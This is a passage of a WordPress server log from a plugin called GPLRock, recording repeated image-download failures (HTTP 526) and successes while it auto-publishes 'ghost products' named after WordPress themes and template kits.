https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3cb34bda.jpg [05-Apr-2026 08:55:26 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-aramex [05-Apr-2026 09:05:27 UTC] GPLRock: Image download failed for product busia-creative-agency-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:05:29 UTC] GPLRock: Image download failed for product busia-creative-agency-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:05:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/busia---creative-agency-theme-14690.webp for product busia-creative-agency-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:05:31 UTC] GPLRock: Image download failed for product busia-creative-agency-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:05:33 UTC] GPLRock: Image download failed for product busia-creative-agency-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:05:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/busia---creative-agency-theme-14690.webp for product busia-creative-agency-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:05:35 UTC] GPLRock WARNING: Image download failed for product busia-creative-agency-theme. URL: https://meldwp.com/wp-content/uploads/busia---creative-agency-theme-14690.webp [05-Apr-2026 09:05:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: busia-creative-agency-theme [05-Apr-2026 09:05:36 UTC] GPLRock: Image download failed for product nikado-responsive-theme-for-woocommerce-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:05:38 UTC] GPLRock: Image download failed for product nikado-responsive-theme-for-woocommerce-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:05:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nikado---responsive-theme-for-woocommerce-wordpress-30795.webp for product nikado-responsive-theme-for-woocommerce-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:05:40 UTC] GPLRock: Image download failed for product nikado-responsive-theme-for-woocommerce-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:05:42 UTC] GPLRock: Image download failed for product nikado-responsive-theme-for-woocommerce-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:05:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nikado---responsive-theme-for-woocommerce-wordpress-30795.webp for product nikado-responsive-theme-for-woocommerce-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:05:44 UTC] GPLRock WARNING: Image download failed for product nikado-responsive-theme-for-woocommerce-wordpress. URL: https://meldwp.com/wp-content/uploads/nikado---responsive-theme-for-woocommerce-wordpress-30795.webp [05-Apr-2026 09:05:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: nikado-responsive-theme-for-woocommerce-wordpress [05-Apr-2026 09:05:44 UTC] GPLRock: Image download failed for product efuel-electric-car-rental-ev-charging-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:05:46 UTC] GPLRock: Image download failed for product efuel-electric-car-rental-ev-charging-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:05:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/efuel---electric-car-rental--ev-charging-wordpress-theme-25354.webp for product efuel-electric-car-rental-ev-charging-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:05:49 UTC] GPLRock: Image download failed for product efuel-electric-car-rental-ev-charging-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:05:51 UTC] GPLRock: Image download failed for product efuel-electric-car-rental-ev-charging-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:05:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/efuel---electric-car-rental--ev-charging-wordpress-theme-25354.webp for product efuel-electric-car-rental-ev-charging-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:05:53 UTC] GPLRock WARNING: Image download failed for product efuel-electric-car-rental-ev-charging-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/efuel---electric-car-rental--ev-charging-wordpress-theme-25354.webp [05-Apr-2026 09:05:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: efuel-electric-car-rental-ev-charging-wordpress-theme [05-Apr-2026 09:05:53 UTC] GPLRock: Image download failed for product valno-minimal-creative-multi-page-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:05:55 UTC] GPLRock: Image download failed for product valno-minimal-creative-multi-page-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:05:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/valno---minimal-creative-multi-page-portfolio-wordpress-theme-826.webp for product valno-minimal-creative-multi-page-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:05:57 UTC] GPLRock: Image download failed for product valno-minimal-creative-multi-page-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:05:59 UTC] GPLRock: Image download failed for product valno-minimal-creative-multi-page-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:06:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/valno---minimal-creative-multi-page-portfolio-wordpress-theme-826.webp for product valno-minimal-creative-multi-page-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:06:01 UTC] GPLRock WARNING: Image download failed for product valno-minimal-creative-multi-page-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/valno---minimal-creative-multi-page-portfolio-wordpress-theme-826.webp [05-Apr-2026 09:06:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: valno-minimal-creative-multi-page-portfolio-wordpress-theme [05-Apr-2026 09:06:02 UTC] GPLRock: Image download failed for product fixpress-mobile-phone-and-computer-repair-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:06:04 UTC] GPLRock: Image download failed for product fixpress-mobile-phone-and-computer-repair-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:06:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fixpress---mobile-phone-and-computer-repair-wordpress-theme-33547.webp for product fixpress-mobile-phone-and-computer-repair-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:06:06 UTC] GPLRock: Image download failed for product fixpress-mobile-phone-and-computer-repair-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:06:08 UTC] GPLRock: Image download failed for product fixpress-mobile-phone-and-computer-repair-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:06:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fixpress---mobile-phone-and-computer-repair-wordpress-theme-33547.webp for product fixpress-mobile-phone-and-computer-repair-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:06:10 UTC] GPLRock WARNING: Image download failed for product fixpress-mobile-phone-and-computer-repair-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/fixpress---mobile-phone-and-computer-repair-wordpress-theme-33547.webp [05-Apr-2026 09:06:10 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fixpress-mobile-phone-and-computer-repair-wordpress-theme [05-Apr-2026 09:06:10 UTC] GPLRock: Image download failed for product elime-multipurpose-cosmetics-fashion-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:06:12 UTC] GPLRock: Image download failed for product elime-multipurpose-cosmetics-fashion-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:06:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elime---multipurpose-cosmetics--fashion-wordpress-theme-5616.webp for product elime-multipurpose-cosmetics-fashion-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:06:15 UTC] GPLRock: Image download failed for product elime-multipurpose-cosmetics-fashion-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:06:17 UTC] GPLRock: Image download failed for product elime-multipurpose-cosmetics-fashion-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:06:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elime---multipurpose-cosmetics--fashion-wordpress-theme-5616.webp for product elime-multipurpose-cosmetics-fashion-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:06:19 UTC] GPLRock WARNING: Image download failed for product elime-multipurpose-cosmetics-fashion-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/elime---multipurpose-cosmetics--fashion-wordpress-theme-5616.webp [05-Apr-2026 09:06:19 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: elime-multipurpose-cosmetics-fashion-wordpress-theme [05-Apr-2026 09:06:19 UTC] GPLRock: Image download failed for product saras-wine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:06:21 UTC] GPLRock: Image download failed for product saras-wine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:06:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/saras---wine-wordpress-theme-17760.webp for product saras-wine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:06:23 UTC] GPLRock: Image download failed for product saras-wine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:06:25 UTC] GPLRock: Image download failed for product saras-wine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:06:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/saras---wine-wordpress-theme-17760.webp for product saras-wine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:06:28 UTC] GPLRock WARNING: Image download failed for product saras-wine-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/saras---wine-wordpress-theme-17760.webp [05-Apr-2026 09:06:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: saras-wine-wordpress-theme [05-Apr-2026 09:06:28 UTC] GPLRock: Image download failed for product gymbase-gym-fitness-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:06:30 UTC] GPLRock: Image download failed for product gymbase-gym-fitness-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:06:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gymbase---gym-fitness-wordpress-theme-24209.webp for product gymbase-gym-fitness-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:06:32 UTC] GPLRock: Image download failed for product gymbase-gym-fitness-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:06:34 UTC] GPLRock: Image download failed for product gymbase-gym-fitness-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:06:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gymbase---gym-fitness-wordpress-theme-24209.webp for product gymbase-gym-fitness-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:06:36 UTC] GPLRock WARNING: Image download failed for product gymbase-gym-fitness-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/gymbase---gym-fitness-wordpress-theme-24209.webp [05-Apr-2026 09:06:36 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gymbase-gym-fitness-wordpress-theme [05-Apr-2026 09:06:37 UTC] GPLRock: Image download failed for product festiva-event-conference-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:06:39 UTC] GPLRock: Image download failed for product festiva-event-conference-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:06:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/festiva---event--conference-wordpress-theme-26040.webp for product festiva-event-conference-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:06:41 UTC] GPLRock: Image download failed for product festiva-event-conference-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:06:43 UTC] GPLRock: Image download failed for product festiva-event-conference-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:06:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/festiva---event--conference-wordpress-theme-26040.webp for product festiva-event-conference-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:06:45 UTC] GPLRock WARNING: Image download failed for product festiva-event-conference-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/festiva---event--conference-wordpress-theme-26040.webp [05-Apr-2026 09:06:45 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: festiva-event-conference-wordpress-theme [05-Apr-2026 09:06:45 UTC] GPLRock: Image download failed for product xcare-medical-and-health-care-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:06:47 UTC] GPLRock: Image download failed for product xcare-medical-and-health-care-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:06:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/xcare---medical-and-health-care-wordpress-theme-4326.webp for product xcare-medical-and-health-care-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:06:50 UTC] GPLRock: Image download failed for product xcare-medical-and-health-care-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:06:52 UTC] GPLRock: Image download failed for product xcare-medical-and-health-care-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:06:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/xcare---medical-and-health-care-wordpress-theme-4326.webp for product xcare-medical-and-health-care-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:06:54 UTC] GPLRock WARNING: Image download failed for product xcare-medical-and-health-care-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/xcare---medical-and-health-care-wordpress-theme-4326.webp [05-Apr-2026 09:06:54 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: xcare-medical-and-health-care-wordpress-theme [05-Apr-2026 09:07:16 UTC] GPLRock: Image downloaded successfully for product x-fitt-personal-trainer-gym-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-40b9678d.webp [05-Apr-2026 09:07:16 UTC] GPLRock: Using pre-downloaded image for product x-fitt-personal-trainer-gym-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-40b9678d.webp [05-Apr-2026 09:07:16 UTC] GPLRock: Ghost product published with image - Product ID: x-fitt-personal-trainer-gym-elementor-template-kit [05-Apr-2026 09:07:18 UTC] GPLRock: Image downloaded successfully for product wypool-swimming-pool-cleaning-maintenance-serviceor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4f7195d9.jpg [05-Apr-2026 09:07:18 UTC] GPLRock: Using pre-downloaded image for product wypool-swimming-pool-cleaning-maintenance-serviceor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4f7195d9.jpg [05-Apr-2026 09:07:18 UTC] GPLRock: Ghost product published with image - Product ID: wypool-swimming-pool-cleaning-maintenance-serviceor-template-kit [05-Apr-2026 09:07:19 UTC] GPLRock: Image downloaded successfully for product wrote-content-writing-copywriting-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e4a0ccd4.webp [05-Apr-2026 09:07:19 UTC] GPLRock: Using pre-downloaded image for product wrote-content-writing-copywriting-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e4a0ccd4.webp [05-Apr-2026 09:07:19 UTC] GPLRock: Ghost product published with image - Product ID: wrote-content-writing-copywriting-template-kit [05-Apr-2026 09:07:21 UTC] GPLRock: Image downloaded successfully for product writingg-content-copywriting-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3af41d2d.webp [05-Apr-2026 09:07:21 UTC] GPLRock: Using pre-downloaded image for product writingg-content-copywriting-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3af41d2d.webp [05-Apr-2026 09:07:21 UTC] GPLRock: Ghost product published with image - Product ID: writingg-content-copywriting-services-elementor-template-kit [05-Apr-2026 09:07:23 UTC] GPLRock: Image downloaded successfully for product writica-content-writing-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2bed8203.jpg [05-Apr-2026 09:07:23 UTC] GPLRock: Using pre-downloaded image for product writica-content-writing-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2bed8203.jpg [05-Apr-2026 09:07:23 UTC] GPLRock: Ghost product published with image - Product ID: writica-content-writing-services-elementor-template-kit [05-Apr-2026 09:07:24 UTC] GPLRock: Image downloaded successfully for product writekit-content-writing-services-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-43317201.webp [05-Apr-2026 09:07:24 UTC] GPLRock: Using pre-downloaded image for product writekit-content-writing-services-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-43317201.webp [05-Apr-2026 09:07:24 UTC] GPLRock: Ghost product published with image - Product ID: writekit-content-writing-services-agency-elementor-template-kit [05-Apr-2026 09:07:26 UTC] GPLRock: Image downloaded successfully for product workoution-sports-and-fitness-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-112e4fad.webp [05-Apr-2026 09:07:26 UTC] GPLRock: Using pre-downloaded image for product workoution-sports-and-fitness-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-112e4fad.webp [05-Apr-2026 09:07:26 UTC] GPLRock: Ghost product published with image - Product ID: workoution-sports-and-fitness-elementor-template-kit [05-Apr-2026 09:07:27 UTC] GPLRock: Image downloaded successfully for product woodzone-carpenter-craftsman-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0a291e49.jpg [05-Apr-2026 09:07:27 UTC] GPLRock: Using pre-downloaded image for product woodzone-carpenter-craftsman-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0a291e49.jpg [05-Apr-2026 09:07:27 UTC] GPLRock: Ghost product published with image - Product ID: woodzone-carpenter-craftsman-elementor-template-kit [05-Apr-2026 09:07:29 UTC] GPLRock: Image downloaded successfully for product woodart-artisan-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d99be4bf.webp [05-Apr-2026 09:07:29 UTC] GPLRock: Using pre-downloaded image for product woodart-artisan-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d99be4bf.webp [05-Apr-2026 09:07:29 UTC] GPLRock: Ghost product published with image - Product ID: woodart-artisan-template-kit [05-Apr-2026 09:07:31 UTC] GPLRock: Image downloaded successfully for product womens-foundation-non-profit-wordpress-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-77faf17d.webp [05-Apr-2026 09:07:31 UTC] GPLRock: Using pre-downloaded image for product womens-foundation-non-profit-wordpress-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-77faf17d.webp [05-Apr-2026 09:07:31 UTC] GPLRock: Ghost product published with image - Product ID: womens-foundation-non-profit-wordpress-elementor-template-kit [05-Apr-2026 09:08:36 UTC] GPLRock: Image download failed for product treck-immigration-and-visa-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:08:38 UTC] GPLRock: Image download failed for product treck-immigration-and-visa-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:08:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/treck---immigration-and-visa-consulting-wordpress-theme-19337.webp for product treck-immigration-and-visa-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:08:40 UTC] GPLRock: Image download failed for product treck-immigration-and-visa-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:08:42 UTC] GPLRock: Image download failed for product treck-immigration-and-visa-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:08:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/treck---immigration-and-visa-consulting-wordpress-theme-19337.webp for product treck-immigration-and-visa-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:08:44 UTC] GPLRock WARNING: Image download failed for product treck-immigration-and-visa-consulting-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/treck---immigration-and-visa-consulting-wordpress-theme-19337.webp [05-Apr-2026 09:08:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: treck-immigration-and-visa-consulting-wordpress-theme [05-Apr-2026 09:08:45 UTC] GPLRock: Image download failed for product wood-workshop-carpenter-and-craftsman-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:08:47 UTC] GPLRock: Image download failed for product wood-workshop-carpenter-and-craftsman-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:08:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wood-workshop---carpenter-and-craftsman-wordpress-theme-13647.webp for product wood-workshop-carpenter-and-craftsman-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:08:49 UTC] GPLRock: Image download failed for product wood-workshop-carpenter-and-craftsman-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:08:51 UTC] GPLRock: Image download failed for product wood-workshop-carpenter-and-craftsman-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:08:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wood-workshop---carpenter-and-craftsman-wordpress-theme-13647.webp for product wood-workshop-carpenter-and-craftsman-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:08:53 UTC] GPLRock WARNING: Image download failed for product wood-workshop-carpenter-and-craftsman-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/wood-workshop---carpenter-and-craftsman-wordpress-theme-13647.webp [05-Apr-2026 09:08:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wood-workshop-carpenter-and-craftsman-wordpress-theme [05-Apr-2026 09:08:53 UTC] GPLRock: Image download failed for product fishingclub-fishing-hunting-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:08:56 UTC] GPLRock: Image download failed for product fishingclub-fishing-hunting-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:08:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fishingclub---fishing--hunting-theme-29762.webp for product fishingclub-fishing-hunting-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:08:58 UTC] GPLRock: Image download failed for product fishingclub-fishing-hunting-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:09:00 UTC] GPLRock: Image download failed for product fishingclub-fishing-hunting-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:09:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fishingclub---fishing--hunting-theme-29762.webp for product fishingclub-fishing-hunting-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:09:02 UTC] GPLRock WARNING: Image download failed for product fishingclub-fishing-hunting-theme. URL: https://meldwp.com/wp-content/uploads/fishingclub---fishing--hunting-theme-29762.webp [05-Apr-2026 09:09:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fishingclub-fishing-hunting-theme [05-Apr-2026 09:09:03 UTC] GPLRock: Image download failed for product fidem-church-religion-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:09:05 UTC] GPLRock: Image download failed for product fidem-church-religion-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:09:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fidem---church--religion-wordpress-theme-33289.webp for product fidem-church-religion-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:09:07 UTC] GPLRock: Image download failed for product fidem-church-religion-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:09:09 UTC] GPLRock: Image download failed for product fidem-church-religion-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:09:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fidem---church--religion-wordpress-theme-33289.webp for product fidem-church-religion-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:09:11 UTC] GPLRock WARNING: Image download failed for product fidem-church-religion-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/fidem---church--religion-wordpress-theme-33289.webp [05-Apr-2026 09:09:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fidem-church-religion-wordpress-theme [05-Apr-2026 09:09:11 UTC] GPLRock: Image download failed for product vloma-grid-a-responsive-wordpress-video-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:09:13 UTC] GPLRock: Image download failed for product vloma-grid-a-responsive-wordpress-video-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:09:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vloma-grid---a-responsive-wordpress-video-blog-theme-14420.webp for product vloma-grid-a-responsive-wordpress-video-blog-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:09:16 UTC] GPLRock: Image download failed for product vloma-grid-a-responsive-wordpress-video-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:09:18 UTC] GPLRock: Image download failed for product vloma-grid-a-responsive-wordpress-video-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:09:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vloma-grid---a-responsive-wordpress-video-blog-theme-14420.webp for product vloma-grid-a-responsive-wordpress-video-blog-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:09:20 UTC] GPLRock WARNING: Image download failed for product vloma-grid-a-responsive-wordpress-video-blog-theme. URL: https://meldwp.com/wp-content/uploads/vloma-grid---a-responsive-wordpress-video-blog-theme-14420.webp [05-Apr-2026 09:09:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: vloma-grid-a-responsive-wordpress-video-blog-theme [05-Apr-2026 09:09:20 UTC] GPLRock: Image download failed for product palette-photographer-portfolio-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:09:22 UTC] GPLRock: Image download failed for product palette-photographer-portfolio-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:09:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/palette--photographer-portfolio-wordpress-22617.webp for product palette-photographer-portfolio-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:09:24 UTC] GPLRock: Image download failed for product palette-photographer-portfolio-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:09:27 UTC] GPLRock: Image download failed for product palette-photographer-portfolio-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:09:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/palette--photographer-portfolio-wordpress-22617.webp for product palette-photographer-portfolio-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:09:29 UTC] GPLRock WARNING: Image download failed for product palette-photographer-portfolio-wordpress. URL: https://meldwp.com/wp-content/uploads/palette--photographer-portfolio-wordpress-22617.webp [05-Apr-2026 09:09:29 UTC] GPLRock WARNING: Ghost product published 